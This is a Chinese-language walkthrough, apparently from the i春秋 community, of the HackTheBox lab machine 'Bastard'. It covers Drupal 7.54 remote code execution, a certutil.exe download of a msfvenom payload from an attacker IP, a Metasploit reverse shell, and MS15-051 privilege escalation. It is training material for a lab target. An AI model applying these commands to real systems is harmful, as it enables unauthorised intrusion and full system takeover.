本文是 i 春秋论坛作家「皮卡皮卡丘」表哥分享的技术文章,公众号旨在为大家提供更多的学习方法与技能技巧,文章仅供学习参考。
HTB是一个靶机平台,里面包含多种系统类型的靶机,并且很多靶机非常贴近实战情景,是一个学习渗透测试不错的靶场。
1、靶机介绍
这次的靶机是Bastard。
2、信息搜集
由于autorecon的速度比较慢,这里直接nmap -sC(默认脚本) -sS(快速扫描)过一下,80端口有个Drupal 7的标题,Drupal是个CMS具体的版本信息,可以查看/CHANGELOG.txt。
首先确保这个80端口能正常访问
其次我们跟进一下可以看到版本为7.54
3、搜索payload
我们肯定是用searchsploit查看漏洞版本信息,而版本为7.54最好使用Drupal 7.x Module Services -RemoteCode Execution。
在网上找了一个相关的Drupal的RCE漏洞的CVE编号,并且有很多不同的payload。
在GitHub上漏洞编号就可以,看了一下是python3的格式,并需要安装好以下的库才能顺利执行。
4、getshell进行中
此时直接一个python文件名-cwhoami成功执行。
或者是dir可列出当前目录下的文件名,并指导当前目录为C:inetpubdrupal-7.54。
目前的想法是创建一个新目录,然后我们生成恶意文件传上去一个运行接收shell回来(建议最好创建一个文件夹,用powershell的远程传文件python表示传输成功,但不知道把文件传到哪了)。
使用mkdir创建一个cunfang文件夹
关于传文件这里,在网上找了一一个CertUtil.exe的内置程序比较便捷。
格式为:
certutil.exe -urlcache -split -f http://ip:端口/文件名
此时用msfVENOM生成一个.exe
用刚才的payload通过
certutil.exe-urlcache -split -f http://10.10.14.5:8080/makabaka.exe
把文件传上去(这里的ip是开了python共享模式的kali IP)
此时打开我们的MSF使用exploit/multi/handler经典模块,设置好kali的IP和端口顺便把payload设置为windows/x64/shell/reverse_tcp以后使用run开始监听。
此时用回payload远程执行,如上图所示直接接收shell成功。
这里拿到user的flag。
5、提权
这里提权我打算用MSF的自带提权payload。
用上面的方法添加多一个shell出来,出现meterpreter就是代表成功。
先使用background退出去,注意看session,然后使用
post/multi/recon/local_exploit_suggester模块,设置好session以后run。
根据systeminfo可知这是windows 2008 R2,可以使用大杀器MS15-051可针对Windows Server 2008 R2。
可以理解为49298大杀器通杀之前的靶机。
这里要到github上下载,然后用同样的方法certutil.exe传上去。
此时一波.exe whoami执行成功。
然而能变换最高权限只有在运行.exe +命令的情况下才行:
把shell.exe之前生成的恶意文件拿出来,再用MSF监听。
此时真正变为管理员能拿到root的flag。
以上为今天分享的内容,小伙伴们看懂了吗?
文章素材来源于i春秋社区
注:文章内容仅供学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!
相关推荐
培训认证
END
i春秋官方公众号为大家提供
前沿的网络安全技术
简单易懂的实用工具
紧张刺激的安全竞赛
还有网络安全大讲堂
更多技能等你来解锁
点分享
点点赞
点在看
原文始发于微信公众号(i春秋):HTB靶场记录之Bastard
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论